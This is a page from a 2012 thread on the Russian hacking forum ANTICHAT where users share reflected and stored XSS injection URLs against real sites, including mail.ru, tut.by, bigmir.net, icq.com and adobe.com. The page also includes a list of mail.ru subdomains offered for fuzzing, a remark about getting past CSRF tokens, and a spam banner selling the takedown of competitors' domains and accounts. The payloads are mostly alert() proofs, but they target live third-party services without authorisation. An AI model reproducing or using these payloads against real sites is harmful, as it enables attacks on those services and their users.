УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 23 из 25

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#221

26.02.2012, 13:41

GoodGoogle

Guest

Сообщений: n/a

Провел на форуме:
321017

Репутация: 226

Цитата:

Сообщение от Unix@

Unix@ said:
Не знаю почему у меня работает,честно.

Браузер обнови) попробуй.

#222

26.02.2012, 15:42

Unknown

Guest

Сообщений: n/a

Провел на форуме:
9763

Репутация: 8

Список 403 доменов на мейл.ру

если у кого есть желание могут поФаззить на скрипты

там дырявые есть 100%, парочку пасивок на прошлой неделе снял

Код:

Code:
http://aj.mail.ru
http://bs.mail.ru
http://dn.mail.ru
http://ff.mail.ru
http://fx.mail.ru
http://js.mail.ru
http://kp.mail.ru
http://ok.mail.ru
http://r1.mail.ru
http://r2.mail.ru
http://r3.mail.ru

#223

06.03.2012, 12:28

Unknown

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 6

Xss на Mail.ru

1. Заходим на страницу http://webagent.mail.ru/r/webagent/popup.html?branch=redesign-rc6.

2. Добавить Контакт

3.

Цитата:

Сообщение от None

4.Вставляем этот код в любое место

5.Нажимаем найти

#224

06.03.2012, 14:01

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Unix@, как эту XSS можно использовать на практике?

#225

11.03.2012, 03:00

mr.Penguin

Guest

Сообщений: n/a

Провел на форуме:
10816

Репутация: 74

@bigmir.net

Тип уязвимости: Активная XSS

Находится в сервисе "Дневники".

Где найти?

Мой дневник => Заметки => Добавить заметкуУязвимое поле:

ТегиПример:

alert('xss')

#226

14.03.2012, 13:48

Unknown

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 6

XSS на Mail.ru

Работает только у авторизованных.

Цитата:

Сообщение от None

http://moto.mail.ru/login.html?Page=javascript:alert('xss');

Нажать кнопкуПродолжить

#227

28.03.2012, 02:47

mr.Penguin

Guest

Сообщений: n/a

Провел на форуме:
10816

Репутация: 74

Код:

Code:
http://vashdom.tut.by/search/?search=alert('xss')

#228

30.03.2012, 14:33

Unknown

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 6

TUT.by

Пассивка TUT.by

Цитата:

Сообщение от None

http://slovari.tut.by/index.php?skeyword=">alert(0)">alert(0)

#229

31.03.2012, 00:38

Unknown

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 49

icq.com

validate.icq.com/icq/validate.html?uid=1&sid=23">alert('XSS')&lang=en

adobe.com

store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type=">&code=adobe&cat=classification

#230

31.03.2012, 12:02

eclipse

Guest

Сообщений: n/a

Провел на форуме:
30555

Репутация: 85

Пассивка на ачате))

PR 5 | GI - 4 980 000 | CY 240 | 243 000

Античат конечно не почтовый сервис, но я думаю меня простят)))

http://video.antichat.ru/video/Номер видео/

Post запрос

Цитата:

Сообщение от None

author=">[XSS] или &comment=">[XSS]

Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка )

Страница 23 из 25

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход